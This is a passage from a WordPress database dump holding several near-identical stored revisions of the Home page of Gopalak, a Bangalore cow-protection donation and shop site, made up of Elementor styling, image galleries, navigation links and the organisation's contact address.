alt=\"279356\" /></figure>			\n												Previous\n												Next\n			<h4>Address</h4>		\n			 #800 Spandana towers\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: namaste@gopalak.in','Home','','inherit','closed','closed','','1373-revision-v1','','','2022-10-20 11:17:10','2022-10-20 05:47:10','',1373,'https://gopalak.in/?p=1910',0,'revision','',0),(1911,1,'2022-10-20 11:17:10','2022-10-20 05:47:10','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/GOPALAK-COIN-2.0-150x150.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/GOPALAK-COIN-2.0-150x150.png 150w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK-COIN-2.0-300x300.png 300w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK-COIN-2.0-768x768.png 768w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK-COIN-2.0-320x320.png 320w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK-COIN-2.0-50x50.png 50w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK-COIN-2.0-100x100.png 100w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK-COIN-2.0-48x48.png 48w, https://gopalak.in/wp-content/uploads/2022/10/elementor/thumbs/GOPALAK-COIN-2.0-pwh7pivzzxoisxtaw3iodq3bqsq80x3rkk57uej99q.png 75w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK-COIN-2.0.png 1000w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<a href=\"https://gopalak.in/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/donate/\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/aboutus/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-carousel .swiper-container{position:static}.elementor-widget-image-carousel .swiper-container .swiper-slide figure{line-height:inherit}.elementor-widget-image-carousel .swiper-slide{text-align:center}.elementor-image-carousel-wrapper:not(.swiper-container-initialized) .swiper-slide{max-width:calc(100% / var(--e-image-carousel-slides-to-show, 3))}</style>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2602864-scaled.jpg\" alt=\"pexels-mark-stebnicki-2602864\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kat-smith-735976-scaled.jpg\" alt=\"pexels-kat-smith-735976\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2252557-scaled.jpg\" alt=\"pexels-mark-stebnicki-2252557\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-min-an-1455455-scaled.jpg\" alt=\"pexels-min-an-1455455\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-roman-odintsov-8747798-scaled.jpg\" alt=\"pexels-roman-odintsov-8747798\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kelly-2881385-scaled.jpg\" alt=\"pexels-kelly-2881385\" /></figure>			\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/depositphotos_12743475-stock-photo-farm-cattle.webp\" title=\"depositphotos_12743475-stock-photo-farm-cattle\" alt=\"depositphotos_12743475-stock-photo-farm-cattle\" /></figure><h3>Adopt/Donate</h3><p>You can donate any amount of your choice which will be used for fodder to feed cows.</p>		\n			<a href=\"https://gopalak.in/donate/\" role=\"button\">\n						Click here\n					</a>\n			<figure><img src=\"https://gopalak.in/wp-content/uploads/elementor/thumbs/banner1-puue8o9j5oqv02mjuegklieu6t8ry4rsfq4igtrp88.jpg\" title=\"banner1\" alt=\"banner1\" /></figure><h3>Shop With Us</h3><p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>About Gopalak</h2>		\n		<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br />Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being</p>		\n			<a href=\"https://gopalak.in/aboutus/\" role=\"button\">\n						Click here\n					</a>\n		https://www.youtube.com/watch?v=0wll4Km5AU8https://www.youtube.com/watch?v=bEyCT3KsAMQhttps://www.youtube.com/watch?v=sVQg0-3WSc4		\n			<h2>Gallery</h2>		\n		<p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/banner1-150x150.jpg\" alt=\"banner1\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/cows-farming-on-green-meadow-260nw-1704884002-150x150.webp\" alt=\"cows-farming-on-green-meadow-260nw-1704884002\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/803471-150x150.jpg\" alt=\"803471\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-150x150.webp\" alt=\"279356\" /></figure>			\n												Previous\n												Next\n			<h4>Address</h4>		\n			 #800 Spandana towers\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: namaste@gopalak.in','Home','','inherit','closed','closed','','1373-revision-v1','','','2022-10-20 11:17:10','2022-10-20 05:47:10','',1373,'https://gopalak.in/?p=1911',0,'revision','',0),(1912,1,'2022-10-20 11:17:10','2022-10-20 05:47:10','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png 150w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-300x300.png 300w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-320x320.png 320w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-50x50.png 50w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-100x100.png 100w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-48x48.png 48w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-270x270.png 270w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-192x192.png 192w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-180x180.png 180w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-32x32.png 32w, https://gopalak.in/wp-content/uploads/2022/10/elementor/thumbs/cropped-GOPALAK-COIN-2.0-pwh7vrjfdc81vqqzgamifnehpvyy4kvm3g29jja5ym.png 75w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0.png 512w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<a href=\"https://gopalak.in/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/donate/\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/aboutus/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-carousel .swiper-container{position:static}.elementor-widget-image-carousel .swiper-container .swiper-slide figure{line-height:inherit}.elementor-widget-image-carousel .swiper-slide{text-align:center}.elementor-image-carousel-wrapper:not(.swiper-container-initialized) .swiper-slide{max-width:calc(100% / var(--e-image-carousel-slides-to-show, 3))}</style>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2602864-scaled.jpg\" alt=\"pexels-mark-stebnicki-2602864\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kat-smith-735976-scaled.jpg\" alt=\"pexels-kat-smith-735976\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2252557-scaled.jpg\" alt=\"pexels-mark-stebnicki-2252557\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-min-an-1455455-scaled.jpg\" alt=\"pexels-min-an-1455455\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-roman-odintsov-8747798-scaled.jpg\" alt=\"pexels-roman-odintsov-8747798\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kelly-2881385-scaled.jpg\" alt=\"pexels-kelly-2881385\" /></figure>			\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/depositphotos_12743475-stock-photo-farm-cattle.webp\" title=\"depositphotos_12743475-stock-photo-farm-cattle\" alt=\"depositphotos_12743475-stock-photo-farm-cattle\" /></figure><h3>Adopt/Donate</h3><p>You can donate any amount of your choice which will be used for fodder to feed cows.</p>		\n			<a href=\"https://gopalak.in/donate/\" role=\"button\">\n						Click here\n					</a>\n			<figure><img src=\"https://gopalak.in/wp-content/uploads/elementor/thumbs/banner1-puue8o9j5oqv02mjuegklieu6t8ry4rsfq4igtrp88.jpg\" title=\"banner1\" alt=\"banner1\" /></figure><h3>Shop With Us</h3><p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>About Gopalak</h2>		\n		<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br />Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being</p>		\n			<a href=\"https://gopalak.in/aboutus/\" role=\"button\">\n						Click here\n					</a>\n		https://www.youtube.com/watch?v=0wll4Km5AU8https://www.youtube.com/watch?v=bEyCT3KsAMQhttps://www.youtube.com/watch?v=sVQg0-3WSc4		\n			<h2>Gallery</h2>		\n		<p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/banner1-150x150.jpg\" alt=\"banner1\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/cows-farming-on-green-meadow-260nw-1704884002-150x150.webp\" alt=\"cows-farming-on-green-meadow-260nw-1704884002\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/803471-150x150.jpg\" alt=\"803471\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-150x150.webp\" alt=\"279356\" /></figure>			\n												Previous\n												Next\n			<h4>Address</h4>		\n			 #800 Spandana towers\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: namaste@gopalak.in','Home','','inherit','closed','closed','','1373-revision-v1','','','2022-10-20 11:17:10','2022-10-20 05:47:10','',1373,'https://gopalak.in/?p=1912',0,'revision','',0),(1914,1,'2022-10-20 16:10:27','2022-10-20 10:40:27','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png 150w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-300x300.png 300w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-320x320.png 320w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-50x50.png 50w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-100x100.png 100w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-48x48.png 48w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-270x270.png 270w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-192x192.png 192w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-180x180.png 180w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-32x32.png 32w, https://gopalak.in/wp-content/uploads/2022/10/elementor/thumbs/cropped-GOPALAK-COIN-2.0-pwh7vrjfdc81vqqzgamifnehpvyy4kvm3g29jja5ym.png 75w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0.png 512w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<a href=\"https://gopalak.in/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/donate/\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/aboutus/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-carousel .swiper-container{position:static}.elementor-widget-image-carousel .swiper-container .swiper-slide figure{line-height:inherit}.elementor-widget-image-carousel .swiper-slide{text-align:center}.elementor-image-carousel-wrapper:not(.swiper-container-initialized) .swiper-slide{max-width:calc(100% / var(--e-image-carousel-slides-to-show, 3))}</style>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2602864-scaled.jpg\" alt=\"pexels-mark-stebnicki-2602864\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kat-smith-735976-scaled.jpg\" alt=\"pexels-kat-smith-735976\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2252557-scaled.jpg\" alt=\"pexels-mark-stebnicki-2252557\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-min-an-1455455-scaled.jpg\" alt=\"pexels-min-an-1455455\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-roman-odintsov-8747798-scaled.jpg\" alt=\"pexels-roman-odintsov-8747798\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kelly-2881385-scaled.jpg\" alt=\"pexels-kelly-2881385\" /></figure>			\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/depositphotos_12743475-stock-photo-farm-cattle.webp\" title=\"depositphotos_12743475-stock-photo-farm-cattle\" alt=\"depositphotos_12743475-stock-photo-farm-cattle\" /></figure><h3>Adopt/Donate</h3><p>You can donate any amount of your choice which will be used for fodder to feed cows.</p>		\n			<a href=\"https://gopalak.in/donate/\" role=\"button\">\n						Click here\n					</a>\n			<figure><img src=\"https://gopalak.in/wp-content/uploads/elementor/thumbs/banner1-puue8o9j5oqv02mjuegklieu6t8ry4rsfq4igtrp88.jpg\" title=\"banner1\" alt=\"banner1\" /></figure><h3>Shop With Us</h3><p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>About Gopalak</h2>		\n		<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br />Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being</p>		\n			<a href=\"https://gopalak.in/aboutus/\" role=\"button\">\n						Click here\n					</a>\n		https://www.youtube.com/watch?v=0wll4Km5AU8https://www.youtube.com/watch?v=bEyCT3KsAMQhttps://www.youtube.com/watch?v=sVQg0-3WSc4		\n			<h2>Gallery</h2>		\n		<p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/banner1-150x150.jpg\" alt=\"banner1\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/cows-farming-on-green-meadow-260nw-1704884002-150x150.webp\" alt=\"cows-farming-on-green-meadow-260nw-1704884002\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/803471-150x150.jpg\" alt=\"803471\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-150x150.webp\" alt=\"279356\" /></figure>			\n												Previous\n												Next\n			<h4>Address</h4>		\n			 #800 Spandana towers\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: namaste@gopalak.in','Home','','inherit','closed','closed','','1373-revision-v1','','','2022-10-20 16:10:27','2022-10-20 10:40:27','',1373,'https://gopalak.in/?p=1914',0,'revision','',0),(1915,1,'2022-10-20 16:10:27','2022-10-20 10:40:27','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png 150w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-300x300.png 300w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-320x320.png 320w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-50x50.png 50w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-100x100.png 100w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-48x48.png 48w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-270x270.png 270w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-192x192.png 192w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-180x180.png 180w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-32x32.png 32w, https://gopalak.in/wp-content/uploads/2022/10/elementor/thumbs/cropped-GOPALAK-COIN-2.0-pwh7vrjfdc81vqqzgamifnehpvyy4kvm3g29jja5ym.png 75w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0.png 512w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<a href=\"https://gopalak.in/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/donate/\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/aboutus/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-carousel .swiper-container{position:static}.elementor-widget-image-carousel .swiper-container .swiper-slide figure{line-height:inherit}.elementor-widget-image-carousel .swiper-slide{text-align:center}.elementor-image-carousel-wrapper:not(.swiper-container-initialized) .swiper-slide{max-width:calc(100% / var(--e-image-carousel-slides-to-show, 3))}</style>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2602864-scaled.jpg\" alt=\"pexels-mark-stebnicki-2602864\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kat-smith-735976-scaled.jpg\" alt=\"pexels-kat-smith-735976\" 